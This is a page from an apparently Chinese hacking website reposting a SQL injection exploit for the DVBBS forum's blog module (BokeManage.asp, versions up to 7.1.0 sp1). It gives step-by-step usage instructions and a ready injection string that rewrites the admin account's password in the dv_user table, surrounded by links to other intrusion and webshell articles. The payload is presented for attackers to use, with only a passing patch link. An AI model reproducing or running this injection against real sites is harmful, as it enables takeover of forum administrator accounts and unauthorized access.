黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·完美空间提供500M免费AS04-10·企业安全之YY内网准入以04-09
·企业安全之意识与策略04-09·剑走偏锋:IIS漏洞利用04-09
·我来免费网提供100M免费04-09·1122mb.com提供20G超大免04-08
·映像劫持与反劫持技术04-07·让所有"暴力删除工具"无04-07
·入侵88red系统的详细过程04-07·Sql Injection脚本注入终04-07
·vbs+delphi 反弹后门生成04-07·飞讯网提供100MB免费PHP04-07
·突破SQL注入攻击时输入框04-04·结合内核和病毒技术的最04-04
·Real Player rmoc3260.d04-04·亿万网络今月最后为您提04-04
·php+mysql 5 sql inject04-03·Real Player rmoc3260.d04-03
·oblog文件下载漏洞04-03·免费啦提供1G-2G免费全能04-03
·完全解析网页后门和挂马04-02·一句话开3389(只测试过04-02
·萧萧免费空间网提供100M04-02·谷道免费空间网提供1G免04-01
·从本地入手解决双线路由03-31·sablog 1.6 多个跨站漏洞03-31
·富文本编辑器的跨站脚本03-31·Cookie注入是怎样产生的03-31
[组图]DVBBS <= 7.1.0 sp1 博客 远程注入漏洞
      ★★★★★

DVBBS <= 7.1.0 sp1 博客 远程注入漏洞

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-3-14 9:32:59
漏洞文件:BokeManage.asp
受影响版本:DVBBS <= 7.1.0 sp1 SQL版
补丁下载:点击下载
利用方法 (转自守护天使's Blog):
注册会员→ 进入管理博客→关健字设置
随便填


再编辑关健字


上面几个还是随便填写。。
在第三个,也就是连接地址这里写入语句
123123&#39;where 1=0;update dv_user set userpassword=&#39;469e80d32c0559f8&#39; where username=&#39;admin&#39;--
文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    入侵88red系统的详细过程04-07
    对趋势科技等数万网站被攻击的分03-21
    凡人网络购物系统 V8.0 简体中文03-18
    linux平台下渗透日本著名XXXXXX.03-18
    搜索框所引起的XSS漏洞03-05
    跳转漏洞的利用03-05
    对复旦大学的一次漫长渗透03-03
    .net一句话马以及dx论坛拿shell03-01
    php渗透入侵过程图文详解03-01
    DJ网站的入侵详细过程02-26
    BBSXP2008存在后台注射漏洞02-19
    Discuz! 6 后台拿Shell的方法02-17
    相 关 文 章
    dvbbs之PHP版本0day
    Dvbbs8.1 0DAY(通杀access和mssql版本)
    动网8.0最新远程注入漏洞来了
    Alivenotdead免费博客相册空间
    百度博客挂马
    网易博客的60余个事件触发式漏洞与30余
    Bebo免费视频博客空间申请
    Blogsome免费博客申请
    db-db爱你免费博客申请
    雅虎空间免费博客申请
    155免费博客、视频播客申请
    dvbbs sql 得WebShell的分析报告
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886